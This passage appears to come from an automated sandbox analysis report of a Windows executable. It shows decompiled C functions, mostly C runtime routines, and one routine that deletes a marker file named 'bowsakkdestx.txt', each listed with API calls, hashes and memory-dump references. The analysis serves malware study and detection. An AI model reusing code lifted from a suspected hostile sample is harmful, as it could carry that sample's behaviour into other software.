                                                                                    • API ID: ClassCursorLoadRegister
                                                                                    • String ID: 0$LPCWSTRszWindowClass
                                                                                    • API String ID: 1693014935-1496217519
                                                                                    • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                    • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                                                                    • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                    • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 58%
                                                                                    			E0040C420() {
                                                                                    				char _v264;
                                                                                    				CHAR* _t4;
                                                                                    
                                                                                    				_t4 =  &_v264;
                                                                                    				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
                                                                                    				if(_t4 >= 0) {
                                                                                    					PathAppendA( &_v264, "bowsakkdestx.txt");
                                                                                    					return DeleteFileA( &_v264);
                                                                                    				}
                                                                                    				return _t4;
                                                                                    			}






                                                                                    APIs
                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Path$AppendDeleteFileFolder
                                                                                    • String ID: bowsakkdestx.txt
                                                                                    • API String ID: 610490371-2616962270
                                                                                    • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                    • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                    • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                    • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 50%
                                                                                    			E00427C2E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                    
                                                                                    				_t15 = __eflags;
                                                                                    				E00427F51(__ebx, __edx, __edi, __esi, __eflags);
                                                                                    				_t1 =  &_a4; // 0x423b69
                                                                                    				E00427FAE(__ebx, __edx, __edi, __esi,  *_t1);
                                                                                    				E00427CEC(0xff);
                                                                                    				asm("int3");
                                                                                    				_push(1);
                                                                                    				_push(1);
                                                                                    				_push(0);
                                                                                    				return E00427E0E(__ebx, __edi, __esi, _t15);
                                                                                    			}




                                                                                    APIs
                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00427C31
                                                                                      • Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F78
                                                                                      • Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F82
                                                                                    • __NMSG_WRITE.LIBCMT ref: 00427C39
                                                                                      • Part of subcall function 00427FAE: GetModuleFileNameW.KERNEL32(00000000,005104BA,00000104,?,00000001,i;B), ref: 00428040
                                                                                      • Part of subcall function 00427FAE: ___crtMessageBoxW.LIBCMT ref: 004280EE
                                                                                      • Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6
                                                                                    • _doexit.LIBCMT ref: 00427C50
                                                                                      • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                      • Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                      • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                      • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                      • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
                                                                                      • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Pointer$Decode$Encode__initterm_doexit$FileMessageModuleName___crt__lock
                                                                                    • String ID: i;B
                                                                                    • API String ID: 2447380256-472376889
                                                                                    • Opcode ID: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
                                                                                    • Instruction ID: 2444216041853f974cc06d1078168a6e61cf6443a39b7242863de3565bbad4eb
                                                                                    • Opcode Fuzzy Hash: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
                                                                                    • Instruction Fuzzy Hash: 0CC0122079C31826E9513362FD43B5832065B00B08FD2002ABB081D4C2E9CA5594409A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 67%
                                                                                    			E0040ECB0(intOrPtr* __ecx, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
                                                                                    				char _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				char* _v20;
                                                                                    				char _v32;
                                                                                    				intOrPtr _v36;
                                                                                    				char _v40;
                                                                                    				char _v56;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __ebp;
                                                                                    				char* _t82;
                                                                                    				intOrPtr _t85;
                                                                                    				intOrPtr _t99;
                                                                                    				intOrPtr* _t112;
                                                                                    				signed int _t116;
                                                                                    				intOrPtr* _t122;
                                                                                    				void* _t123;
                                                                                    				char* _t129;
                                                                                    				char* _t132;
                                                                                    				intOrPtr _t134;
                                                                                    				intOrPtr* _t136;
                                                                                    				intOrPtr _t138;
                                                                                    				void* _t139;
                                                                                    
                                                                                    				_push(0xffffffff);
                                                                                    				_push(0x4caa30);
                                                                                    				_push( *[fs:0x0]);
                                                                                    				 *[fs:0x0] = _t138;
                                                                                    				_t139 = _t138 - 0x28;
                                                                                    				_push(_t132);
                                                                                    				_t136 = __ecx;
                                                                                    				_v8 = 0;
                                                                                    				_t82 = 0;
                                                                                    				_t112 = 0;
                                                                                    				_v20 = 0;
                                                                                    				if( &_v32 != __ecx) {
                                                                                    					_t82 =  *__ecx;
                                                                                    					 *__ecx = 0;
                                                                                    					_t112 =  *((intOrPtr*)(__ecx + 4));
                                                                                    					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                                    					_v20 = _t82;
                                                                                    					 *((intOrPtr*)(__ecx + 8)) = 0;
                                                                                    				}
                                                                                    				_v8 = 1;
                                                                                    				if(_t82 == 0) {
                                                                                    					L10:
                                                                                    					if(_a20 == 0) {
                                                                                    						L39:
                                                                                    						if(_a24 >= 0x10) {
                                                                                    							_t82 = L00422587(_a4);
                                                                                    							_t139 = _t139 + 4;
                                                                                    						}
                                                                                    						_a24 = 0xf;
                                                                                    						_a20 = 0;
                                                                                    						_a4 = 0;
                                                                                    						if(_a48 >= 0x10) {
                                                                                    							_t82 = L00422587(_a28);
                                                                                    						}
                                                                                    						 *[fs:0x0] = _v16;
                                                                                    						return _t82;
                                                                                    					}
                                                                                    					_t121 =  >=  ? _a28 :  &_a28;
                                                                                    					_push( >=  ? _a28 :  &_a28);
                                                                                    					_t84 =  >=  ? _a4 :  &_a4;
                                                                                    					_push( >=  ? _a4 :  &_a4);
                                                                                    					_t82 = E00421B3B();
                                                                                    					_t129 = _t82;
                                                                                    					_t139 = _t139 + 8;
                                                                                    					if(_t129 == 0) {
                                                                                    						goto L39;
                                                                                    					}
                                                                                    					do {
                                                                                    						_v36 = 0xf;
                                                                                    						_v40 = 0;
                                                                                    						_v56 = 0;
                                                                                    						if( *_t129 != 0) {
                                                                                    							_t122 = _t129;
                                                                                    							_t23 = _t122 + 1; // 0x1
                                                                                    							_t132 = _t23;
                                                                                    							do {
                                                                                    								_t85 =  *_t122;
                                                                                    								_t122 = _t122 + 1;
                                                                                    							} while (_t85 != 0);
                                                                                    							_t123 = _t122 - _t132;
                                                                                    							L18:
                                                                                    							_push(_t123);
                                                                                    							_t124 =  &_v56;
                                                                                    							E004156D0(_t112,  &_v56, _t132, _t129);
                                                                                    							_v8 = 3;
                                                                                    							_t134 =  *((intOrPtr*)(_t136 + 4));
                                                                                    							if( &_v56 >= _t134) {
                                                                                    								L28:
                                                                                    								if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
                                                                                    									E00415230(_t112, _t136, _t134, _t124);
                                                                                    								}
                                                                                    								_t132 =  *((intOrPtr*)(_t136 + 4));
                                                                                    								if(_t132 != 0) {
                                                                                    									 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
                                                                                    									 *((intOrPtr*)(_t132 + 0x10)) = 0;
                                                                                    									 *_t132 = 0;
                                                                                    									if(_v36 >= 0x10) {
                                                                                    										 *_t132 = _v56;
                                                                                    										_v56 = 0;
                                                                                    									} else {
                                                                                    										_t95 = _v40 + 1;
                                                                                    										if(_v40 + 1 != 0) {
                                                                                    											E004205A0(_t132,  &_v56, _t95);
                                                                                    											_t139 = _t139 + 0xc;
                                                                                    										}
                                                                                    									}
                                                                                    									 *((intOrPtr*)(_t132 + 0x10)) = _v40;
                                                                                    									 *((intOrPtr*)(_t132 + 0x14)) = _v36;
                                                                                    									_v36 = 0xf;
                                                                                    									_v40 = 0;
                                                                                    									_v56 = 0;
                                                                                    								}
                                                                                    								goto L36;
                                                                                    							}
                                                                                    							_t99 =  *_t136;
                                                                                    							_t124 =  &_v56;
                                                                                    							if(_t99 > _t124) {
                                                                                    								goto L28;
                                                                                    							}
                                                                                    							_t126 = _t124 - _t99;
                                                                                    							_t116 = (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2);
                                                                                    							if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
                                                                                    								E00415230(_t116, _t136, _t134, _t126);
                                                                                    							}
                                                                                    							_t112 =  *((intOrPtr*)(_t136 + 4));
                                                                                    							_t132 =  *_t136 + (_t116 + _t116 * 2) * 8;
                                                                                    							if(_t112 != 0) {
                                                                                    								 *((intOrPtr*)(_t112 + 0x14)) = 0xf;
                                                                                    								 *((intOrPtr*)(_t112 + 0x10)) = 0;
                                                                                    								 *_t112 = 0;
                                                                                    								if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
                                                                                    									 *_t112 =  *_t132;
                                                                                    									 *_t132 = 0;
                                                                                    								} else {
                                                                                    									_t107 =  *((intOrPtr*)(_t132 + 0x10)) + 1;
                                                                                    									if( *((intOrPtr*)(_t132 + 0x10)) + 1 != 0) {
                                                                                    										E004205A0(_t112, _t132, _t107);
                                                                                    										_t139 = _t139 + 0xc;
                                                                                    									}
                                                                                    								}
                                                                                    								 *((intOrPtr*)(_t112 + 0x10)) =  *((intOrPtr*)(_t132 + 0x10));
                                                                                    								 *((intOrPtr*)(_t112 + 0x14)) =  *((intOrPtr*)(_t132 + 0x14));
                                                                                    								 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
                                                                                    								 *((intOrPtr*)(_t132 + 0x10)) = 0;
                                                                                    								 *_t132 = 0;
                                                                                    							}
                                                                                    							goto L36;
                                                                                    						}
                                                                                    						_t123 = 0;
                                                                                    						goto L18;
                                                                                    						L36:
                                                                                    						 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 0x18;
                                                                                    						_v8 = 1;
                                                                                    						if(_v36 >= 0x10) {
                                                                                    							L00422587(_v56);
                                                                                    							_t139 = _t139 + 4;
                                                                                    						}
                                                                                    						_t89 =  >=  ? _a28 :  &_a28;
                                                                                    						_push( >=  ? _a28 :  &_a28);
                                                                                    						_push(0);
                                                                                    						_t82 = E00421B3B();
                                                                                    						_t129 = _t82;
                                                                                    						_t139 = _t139 + 8;
                                                                                    					} while (_t129 != 0);
                                                                                    					goto L39;
                                                                                    				}
                                                                                    				_t132 = _t82;
                                                                                    				if(_t82 == _t112) {
                                                                                    					L9:
                                                                                    					_t82 = L00422587(_t82);
                                                                                    					_t139 = _t139 + 4;
                                                                                    					goto L10;
                                                                                    				} else {
                                                                                    					do {
                                                                                    						if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
                                                                                    							L00422587( *_t132);
                                                                                    							_t139 = _t139 + 4;
                                                                                    						}
                                                                                    						 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
                                                                                    						 *((intOrPtr*)(_t132 + 0x10)) = 0;
                                                                                    						 *_t132 = 0;
                                                                                    						_t132 = _t132 + 0x18;
                                                                                    					} while (_t132 != _t112);
                                                                                    					_t82 = _v20;
                                                                                    					goto L9;
                                                                                    				}
                                                                                    			}



























                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memmove_strtok
                                                                                    • String ID:
                                                                                    • API String ID: 3446180046-0
                                                                                    • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                    • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                    • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                    • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 72%
                                                                                    			E00422130(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                    				char* _v8;
                                                                                    				signed int _v12;
                                                                                    				signed int _v16;
                                                                                    				signed int _v20;
                                                                                    				void* __ebx;
                                                                                    				void* __esi;
                                                                                    				signed int _t74;
                                                                                    				char _t81;
                                                                                    				signed int _t86;
                                                                                    				signed int _t88;
                                                                                    				signed int _t91;
                                                                                    				signed int _t94;
                                                                                    				signed int _t97;
                                                                                    				signed int _t98;
                                                                                    				char* _t99;
                                                                                    				signed int _t100;
                                                                                    				signed int _t102;
                                                                                    				signed int _t103;
                                                                                    				signed int _t104;
                                                                                    				char* _t110;
                                                                                    				signed int _t113;
                                                                                    				signed int _t117;
                                                                                    				signed int _t119;
                                                                                    				void* _t120;
                                                                                    
                                                                                    				_t99 = _a4;
                                                                                    				_t74 = _a8;
                                                                                    				_v8 = _t99;
                                                                                    				_v12 = _t74;
                                                                                    				if(_a12 == 0) {
                                                                                    					L5:
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t97 = _a16;
                                                                                    				if(_t97 == 0) {
                                                                                    					goto L5;
                                                                                    				}
                                                                                    				_t124 = _t99;
                                                                                    				if(_t99 != 0) {
                                                                                    					_t119 = _a20;
                                                                                    					__eflags = _t119;
                                                                                    					if(_t119 == 0) {
                                                                                    						L9:
                                                                                    						__eflags = _a8 - 0xffffffff;
                                                                                    						if(_a8 != 0xffffffff) {
                                                                                    							_t74 = E0042B420(_t99, 0, _a8);
                                                                                    							_t120 = _t120 + 0xc;
                                                                                    						}
                                                                                    						__eflags = _t119;
                                                                                    						if(__eflags == 0) {
                                                                                    							goto L3;
                                                                                    						} else {
                                                                                    							__eflags = _t97 - (_t74 | 0xffffffff) / _a12;
                                                                                    							if(__eflags > 0) {
                                                                                    								goto L3;
                                                                                    							}
                                                                                    							L13:
                                                                                    							_t117 = _a12 * _t97;
                                                                                    							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                                                    							_t98 = _t117;
                                                                                    							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                                                    								_t100 = 0x1000;
                                                                                    							} else {
                                                                                    								_t100 =  *(_t119 + 0x18);
                                                                                    							}
                                                                                    							_v16 = _t100;
                                                                                    							__eflags = _t117;
                                                                                    							if(_t117 == 0) {
                                                                                    								L41:
                                                                                    								return _a16;
                                                                                    							} else {
                                                                                    								do {
                                                                                    									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                                                    									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                                                    										L24:
                                                                                    										__eflags = _t98 - _t100;
                                                                                    										if(_t98 < _t100) {
                                                                                    											_t81 = E0042B2F2(_t98, _t119, _t119);
                                                                                    											__eflags = _t81 - 0xffffffff;
                                                                                    											if(_t81 == 0xffffffff) {
                                                                                    												L46:
                                                                                    												return (_t117 - _t98) / _a12;
                                                                                    											}
                                                                                    											_t102 = _v12;
                                                                                    											__eflags = _t102;
                                                                                    											if(_t102 == 0) {
                                                                                    												L42:
                                                                                    												__eflags = _a8 - 0xffffffff;
                                                                                    												if(__eflags != 0) {
                                                                                    													E0042B420(_a4, 0, _a8);
                                                                                    												}
                                                                                    												 *((intOrPtr*)(E00425208(__eflags))) = 0x22;
                                                                                    												L4:
                                                                                    												E004242D2();
                                                                                    												goto L5;
                                                                                    											}
                                                                                    											_t110 = _v8;
                                                                                    											 *_t110 = _t81;
                                                                                    											_t98 = _t98 - 1;
                                                                                    											_v8 = _t110 + 1;
                                                                                    											_t103 = _t102 - 1;
                                                                                    											__eflags = _t103;
                                                                                    											_v12 = _t103;
                                                                                    											_t100 =  *(_t119 + 0x18);
                                                                                    											_v16 = _t100;
                                                                                    											goto L40;
                                                                                    										}
                                                                                    										__eflags = _t100;
                                                                                    										if(_t100 == 0) {
                                                                                    											_t86 = 0x7fffffff;
                                                                                    											__eflags = _t98 - 0x7fffffff;
                                                                                    											if(_t98 <= 0x7fffffff) {
                                                                                    												_t86 = _t98;
                                                                                    											}
                                                                                    										} else {
                                                                                    											__eflags = _t98 - 0x7fffffff;
                                                                                    											if(_t98 <= 0x7fffffff) {
                                                                                    												_t44 = _t98 % _t100;
                                                                                    												__eflags = _t44;
                                                                                    												_t113 = _t44;
                                                                                    												_t91 = _t98;
                                                                                    											} else {
                                                                                    												_t113 = 0x7fffffff % _t100;
                                                                                    												_t91 = 0x7fffffff;
                                                                                    											}
                                                                                    											_t86 = _t91 - _t113;
                                                                                    										}
                                                                                    										__eflags = _t86 - _v12;
                                                                                    										if(_t86 > _v12) {
                                                                                    											goto L42;
                                                                                    										} else {
                                                                                    											_push(_t86);
                                                                                    											_push(_v8);
                                                                                    											_push(E0042816B(_t119));
                                                                                    											_t88 = E0042B5C4();
                                                                                    											_t120 = _t120 + 0xc;
                                                                                    											__eflags = _t88;
                                                                                    											if(_t88 == 0) {
                                                                                    												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                                                                                    												goto L46;
                                                                                    											}
                                                                                    											__eflags = _t88 - 0xffffffff;
                                                                                    											if(_t88 == 0xffffffff) {
                                                                                    												L45:
                                                                                    												_t64 = _t119 + 0xc;
                                                                                    												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                                                                                    												__eflags =  *_t64;
                                                                                    												goto L46;
                                                                                    											}
                                                                                    											_t98 = _t98 - _t88;
                                                                                    											__eflags = _t98;
                                                                                    											L36:
                                                                                    											_v8 = _v8 + _t88;
                                                                                    											_v12 = _v12 - _t88;
                                                                                    											_t100 = _v16;
                                                                                    											goto L40;
                                                                                    										}
                                                                                    									}
                                                                                    									_t94 =  *(_t119 + 4);
                                                                                    									_v20 = _t94;
                                                                                    									__eflags = _t94;
                                                                                    									if(__eflags == 0) {
                                                                                    										goto L24;
                                                                                    									}
                                                                                    									if(__eflags < 0) {
                                                                                    										goto L45;
                                                                                    									}
                                                                                    									__eflags = _t98 - _t94;
                                                                                    									if(_t98 < _t94) {
                                                                                    										_t94 = _t98;
                                                                                    										_v20 = _t98;
                                                                                    									}
                                                                                    									_t104 = _v12;
                                                                                    									__eflags = _t94 - _t104;
                                                                                    									if(_t94 > _t104) {
                                                                                    										goto L42;
                                                                                    									} else {
                                                                                    										E00429544(_v8, _t104,  *_t119, _t94);
                                                                                    										_t88 = _v20;
                                                                                    										_t120 = _t120 + 0x10;
                                                                                    										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                                                                                    										_t98 = _t98 - _t88;
                                                                                    										 *_t119 =  *_t119 + _t88;
                                                                                    										goto L36;
                                                                                    									}
                                                                                    									L40:
                                                                                    									__eflags = _t98;
                                                                                    								} while (_t98 != 0);
                                                                                    								goto L41;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					_t74 = (_t74 | 0xffffffff) / _a12;
                                                                                    					__eflags = _t97 - _t74;
                                                                                    					if(_t97 <= _t74) {
                                                                                    						goto L13;
                                                                                    					}
                                                                                    					goto L9;
                                                                                    				}
                                                                                    				L3:
                                                                                    				 *((intOrPtr*)(E00425208(_t124))) = 0x16;
                                                                                    				goto L4;
                                                                                    			}



























                                                                                    0x00422266
                                                                                    0x00422268
                                                                                    0x004222ef
                                                                                    0x00000000
                                                                                    0x004222ef
                                                                                    0x0042226e
                                                                                    0x00422271
                                                                                    0x004222dd
                                                                                    0x004222dd
                                                                                    0x004222dd
                                                                                    0x004222dd
                                                                                    0x00000000
                                                                                    0x004222dd
                                                                                    0x00422273
                                                                                    0x00422273
                                                                                    0x00422275
                                                                                    0x00422275
                                                                                    0x00422278
                                                                                    0x0042227b
                                                                                    0x00000000
                                                                                    0x0042227b
                                                                                    0x00422250
                                                                                    0x004221d5
                                                                                    0x004221d8
                                                                                    0x004221db
                                                                                    0x004221dd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004221df
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004221e5
                                                                                    0x004221e7
                                                                                    0x004221e9
                                                                                    0x004221eb
                                                                                    0x004221eb
                                                                                    0x004221ee
                                                                                    0x004221f1
                                                                                    0x004221f3
                                                                                    0x00000000
                                                                                    0x004221f9
                                                                                    0x00422200
                                                                                    0x00422205
                                                                                    0x00422208
                                                                                    0x0042220b
                                                                                    0x0042220e
                                                                                    0x00422210
                                                                                    0x00000000
                                                                                    0x00422210
                                                                                    0x004222a7
                                                                                    0x004222a7
                                                                                    0x004222a7
                                                                                    0x00000000
                                                                                    0x004221cc
                                                                                    0x004221c6
                                                                                    0x00422198
                                                                                    0x0042217b
                                                                                    0x0042217e
                                                                                    0x00422180
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00422180
                                                                                    0x00422156
                                                                                    0x0042215b
                                                                                    0x00000000

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                    • String ID:
                                                                                    • API String ID: 2974526305-0
                                                                                    • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                    • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                    • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                    • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0043C677(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                    				char _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				int _v20;
                                                                                    				int _t35;
                                                                                    				int _t38;
                                                                                    				intOrPtr* _t44;
                                                                                    				int _t47;
                                                                                    				short* _t49;
                                                                                    				intOrPtr _t50;
                                                                                    				intOrPtr _t54;
                                                                                    				int _t55;
                                                                                    				int _t59;
                                                                                    				char* _t62;
                                                                                    
                                                                                    				_t62 = _a8;
                                                                                    				if(_t62 == 0) {
                                                                                    					L5:
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t50 = _a12;
                                                                                    				if(_t50 == 0) {
                                                                                    					goto L5;
                                                                                    				}
                                                                                    				if( *_t62 != 0) {
                                                                                    					E0042019C( &_v20, _a16);
                                                                                    					_t35 = _v20;
                                                                                    					__eflags =  *(_t35 + 0xa8);
                                                                                    					if( *(_t35 + 0xa8) != 0) {
                                                                                    						_t38 = E00422BCC( *_t62 & 0x000000ff,  &_v20);
                                                                                    						__eflags = _t38;
                                                                                    						if(_t38 == 0) {
                                                                                    							__eflags = _a4;
                                                                                    							_t59 = 1;
                                                                                    							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                    							if(__eflags != 0) {
                                                                                    								L21:
                                                                                    								__eflags = _v8;
                                                                                    								if(_v8 != 0) {
                                                                                    									_t54 = _v12;
                                                                                    									_t31 = _t54 + 0x70;
                                                                                    									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                    									__eflags =  *_t31;
                                                                                    								}
                                                                                    								return _t59;
                                                                                    							}
                                                                                    							L20:
                                                                                    							_t44 = E00425208(__eflags);
                                                                                    							_t59 = _t59 | 0xffffffff;
                                                                                    							__eflags = _t59;
                                                                                    							 *_t44 = 0x2a;
                                                                                    							goto L21;
                                                                                    						}
                                                                                    						_t59 = _v20;
                                                                                    						__eflags =  *(_t59 + 0x74) - 1;
                                                                                    						if( *(_t59 + 0x74) <= 1) {
                                                                                    							L15:
                                                                                    							__eflags = _t50 -  *(_t59 + 0x74);
                                                                                    							L16:
                                                                                    							if(__eflags < 0) {
                                                                                    								goto L20;
                                                                                    							}
                                                                                    							__eflags = _t62[1];
                                                                                    							if(__eflags == 0) {
                                                                                    								goto L20;
                                                                                    							}
                                                                                    							L18:
                                                                                    							_t59 =  *(_t59 + 0x74);
                                                                                    							goto L21;
                                                                                    						}
                                                                                    						__eflags = _t50 -  *(_t59 + 0x74);
                                                                                    						if(__eflags < 0) {
                                                                                    							goto L16;
                                                                                    						}
                                                                                    						__eflags = _a4;
                                                                                    						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                                                                    						_t59 = _v20;
                                                                                    						__eflags = _t47;
                                                                                    						if(_t47 != 0) {
                                                                                    							goto L18;
                                                                                    						}
                                                                                    						goto L15;
                                                                                    					}
                                                                                    					_t55 = _a4;
                                                                                    					__eflags = _t55;
                                                                                    					if(_t55 != 0) {
                                                                                    						 *_t55 =  *_t62 & 0x000000ff;
                                                                                    					}
                                                                                    					_t59 = 1;
                                                                                    					goto L21;
                                                                                    				}
                                                                                    				_t49 = _a4;
                                                                                    				if(_t49 != 0) {
                                                                                    					 *_t49 = 0;
                                                                                    				}
                                                                                    				goto L5;
                                                                                    			}

















                                                                                    APIs
                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                    • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
